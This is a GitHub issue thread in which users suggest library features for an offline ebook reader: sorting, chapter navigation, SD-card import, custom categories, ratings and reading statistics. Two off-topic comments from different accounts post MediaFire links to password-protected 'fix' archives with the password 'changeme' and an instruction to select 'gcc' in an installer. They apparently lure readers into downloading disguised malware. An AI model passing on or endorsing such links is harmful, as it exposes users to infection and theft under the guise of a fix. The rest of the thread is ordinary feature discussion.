### ISSUE TITLE
Library Improvement

### ISSUE THREAD

**Issue by Acclorite** [Acclorite/book-story#57]
Library does not have much customization as of now. It will improve user experience if user could customize it to his needs.

[Suggestion needed](https://github.com/Acclorite/book-story/labels/%F0%9F%93%9D%20Suggestion%20needed). Have an interesting idea on how to further improve this feature? Leave a comment with your idea below! Any ideas are welcome, even incorrect ones are still important, as they can give a birth to a correct one.

### Task list

- [ ] #79 
- [ ] Sorting
- [ ] More visual customization

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Acclorite** [comment]
What is this? @NaiveShiki

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by zx8418** [comment]
Maybe some kind of import wizard displayed on the first run and then accessible from menu?
The reader could scan device storage for supported formats and then display found books with checkmarks alongside them, asking user which books they want imported into the library.

**Comment by Acclorite** [comment]
Does not it exactly what Browse screen does?
Can you explain why would the app need functionality that already exists?

**Comment by sEatLad** [comment]
A way to chapter select/navigate ; like a table of content we can tap on that will take us to an specific chapter or something like that . So we can navigate multi-chapter books with more ease rather to scroll and scroll until we get to a specific chapter. 
if not a table of content then maybe have like little visual "checkpoints" to mark the star of chapters. 
I have put some visual aid.  

![1Screenshot_20240904-200300_crDroid Home](https://github.com/user-attachments/assets/eb42a3b7-7219-4c96-bb63-ae899f0d4b46)

this is a reading visual progress bar from Librera FD It shows you percentage, pages and it shows you little visual sticks 'I' to signal the star of a new chapter (gosh I hope it makes sense what I am trying to explain) 


For Book's Story I was thinking of something like in this 

![1Screenshot_20240904-200030_crDroid Home](https://github.com/user-attachments/assets/d196403c-1169-441d-9895-b7a8f88095ba)

The UI of this app reminds me of Mihon (the comic book reader) well it does have something similar but they do it for images. 

![Screenshot_20240904-201204_crDroid Home](https://github.com/user-attachments/assets/f64ba428-fbab-42d1-a3b8-29eda6a6f9d6)

I hope you can see the little dots it has in its reading progression bar. 

- More options for 'Reading mode' - Could reading progression be done another way other than scrolling? like adding 'page turning' that can be done by tapping specific zone of the screen or/and sliding left or right.  

_I shall continue to use the app best I can and see what else I can come up with if anything. Really find the app superb , I am excited for its progress_

**Comment by zx8418** [comment]
Browse lets you import singular files from filesystem.
What I'm proposing is automating of the process - feature that finds the supported files for you and then allows to choose which to import. 

Just an idea - feels like a thing an average user would enjoy.

**Comment by wasu-code** [comment]
Here I go with some suggestions that came to my mind after opening the app for the first time:


## External storage support 
I mostly store books on external SD card to save space in internal storage. I failed to find a way to import those books.

## Custom categories
Defining own categories beside `Reading|Already Read|Planning|Dropped` may help users better organize their library and adapt the app to their reading habits.

## Import as chapters
Would be great to allow importing multiple files (mostly txt, md and html) as chapters of one book and not only as standalone books.  
Let's say that I have a folder `📂Cool Book` with 5 txt files and I want to import it as a single book with 5 chapters.

## Rating and Notes
After a good read I would love to leave a rating or maybe a short note to myself. Potential use case would be recommending books to a friend - recommending those I gave high rating would be an obvious choice.

**Comment by Acclorite** [comment]
Thank you for constructive suggestion, @wasu-code!
I've added all your suggestions as separate issues, it all sounds interesting and practical, thank you.

- #78 
- #79 
- #81 
- #80

**Comment by pluseach** [comment]
### Net Library? (Project Gutenberg and Feedbook, etc)

It would be nice if we had the ability to import and download directly there.

**Comment by Acclorite** [comment]
> ### Net Library? (Project Gutenberg and Feedbook, etc)
> 
> It would be nice if we have the ability to import and download directly there.

Please, [read this](https://github.com/Acclorite/book-story/discussions/40). The app will not focus on online, it is **offline** eBook reader.

**Comment by pluseach** [comment]
## Statistics & Detailed Stats
This will also add nicely with the ratings & notes, as it shows how many books have been read, how many titles are in the library, and the total number of words read, total read duration, chart/ratings distribution. you could see "_Yokai_," another _Tachiyomi_ fork, which has a stats page.

**Comment by Acclorite** [comment]
Issue already exists #80

**Comment by Acclorite** [comment]
Moved progress to [Library Improvement milestone](https://github.com/Acclorite/book-story/milestone/2).
Moved discussion to https://github.com/Acclorite/book-story/discussions/88.
